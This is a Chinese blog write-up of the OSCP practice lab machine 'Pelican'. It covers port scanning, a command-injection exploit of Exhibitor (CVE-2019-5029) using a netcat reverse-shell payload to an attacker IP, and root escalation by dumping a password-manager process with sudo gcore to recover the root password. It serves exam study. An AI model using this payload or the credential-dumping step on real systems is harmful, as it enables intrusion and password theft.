OSCP考试靶机练习---Pelican

拿shell阶段

先端口扫描:
TCP:

nmap -sC -sV -p- -T4 -n 192.168.226.98 

扫描结果

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp   open  ipp         CUPS 2.2
|_http-title: Forbidden - CUPS v2.2.10
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
2181/tcp  open  zookeeper   Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
8080/tcp  open  http        Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp  open  http        nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.226.98:8080/exhibitor/v1/ui/index.html
39605/tcp open  java-rmi    Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP:
主要是看SNMP端口是否开启,一般是161端口

sudo nmap -Pn -n 192.168.226.98 -sU --top-ports=100 --reason
PORT     STATE         SERVICE  REASON
631/udp  open|filtered ipp      no-response
5353/udp open          zeroconf udp-response ttl 252

445 smb共享枚举

smbclient --no-pass -L //192.168.226.98

在这里插入图片描述

8081端口

跳转

http://192.168.226.98:8080/exhibitor/v1/ui/index.html

在这里插入图片描述
发现版本号V1.0,可以查询漏洞,经过搜索
An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1.
1.0.9 至 1.7.1 版参展商 Web UI 的配置编辑器中存在可被利用的命令注入漏洞。可在编辑器中插入由反拨号或 $() 包围的任意 shell 命令,并在启动 ZooKeeper 时由参展商进程执行。攻击者可作为运行参展商进程的用户执行任何命令。
可能存在CVE-2019-5029

利用步骤:

https://www.exploit-db.com/exploits/48654

payload:

$(/bin/nc -e /bin/sh 192.168.45.183 445 &)

利用步骤:
在这里插入图片描述
根据上文步骤进行利用
在这里插入图片描述
拿到shell

提权

枚举

kali :python3 -m http.server 80
上传工具
wget http://192.168.45.183/pspy64
wget http://192.168.45.183/linpeas.sh

在这里插入图片描述
运行./pspy64,看看能不能捕获一些敏感信息
发现root,一直运行这个:
/bin/sh -c while true; do chown -R charles:charles /opt/zookeeper && chown -R charles:charles /opt/exhibitor && sleep 1; done

在这里插入图片描述
Linux chown(英文全拼:change owner)命令用于设置文件所有者和文件关联组的命令。
chown命令,
大概是将/opt/zookeeper和/opt/exhibitor的所有权修改为,所有文件与子目录的拥有者皆设为 charles,群体的使用者 charles:

再使用./linpeas.sh枚举:
发现sudo -l

在这里插入图片描述
利用网站
https://gtfobins.github.io/gtfobins/gcore/
在这里插入图片描述

It can be used to generate core dumps of running processes. Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named core.$PID, that is then often filtered with strings to narrow down relevant information.
可以针对运行的进程,生成一个二进制文件,主要用于敏感文件查找,那我们详细查看一下现在运行的进程

发现
/usr/bin/password-store 进过goolge好像是一个密码管理器,可能有敏感文件
在这里插入图片描述
使用gcore:
sudo /usr/bin/gcore -a 513
在这里插入图片描述
查看生成的二进制文件

strings core.513 

发现root密码
在这里插入图片描述

su

提权成功
在这里插入图片描述

OSCP 2023 Challenge Writeup-MedTech-优快云博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值